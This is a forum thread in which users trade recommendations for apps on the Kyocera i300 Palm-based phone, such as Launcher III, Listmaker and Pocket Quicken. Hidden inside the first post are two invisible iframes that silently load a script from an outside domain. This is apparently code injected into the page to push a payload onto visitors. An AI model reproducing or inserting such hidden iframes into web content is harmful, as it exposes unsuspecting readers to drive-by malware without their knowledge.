+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Thread: Killer Aps?

Killer Aps?

While absorbing all this technical info and still on the fence on which case to get, I was wondering what everyone thought was the best of the best out there for the I300.

Any suggestions on THE killer ap? A must have.

Being a newbie I've got 2 so far

Avantgo's Mobile Channel Viewer
    and
    American's Flight Schedule

Yeah, I know pretty plain, but I definitely use both of them

NY<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

blazer browser 2.0

FILEZ

launcher III

ooh, the golf game that came with the phone is great!!

smartphonecentral.com
    For me it's the instant messaging apps. Very cool to have access to that wherever. I'm not sure which client I like the most, but I end up on MSN most of the time because that's where most of my contacts are.

BigClock's great too! (Although some people have had probs with the app.)

--Jesse

User ***** Rulz Enforcer

MSN app?

There's an app for MSN Messenger for palm? I couldn't find it. How do you do it?

tia

-chris

I believe you access MSN Messenger fromyour desktop and if you follow menu options are allowed to attach a monile device to sign on and send and receive. www.mobile.msn.com is also a sight to ceck out

1. Iambic's ActionNames. Much better calendaring.

2. Synergy Solution's Listmaker. Much better to-do lists, also used as an outliner.

3. Another vote for Launcher III.

4. Diddlebug (only the Beta works on i300 - search sourceforge.com) - a great (and free) Note pad

Pocket Quicken 2.01

If you use any of the Quicken programs, this is a shining gem! Steep price though. $40 bones. When they do major updates though, $14.95. Try it for free for 14 days.

Whole new worlds are opening up!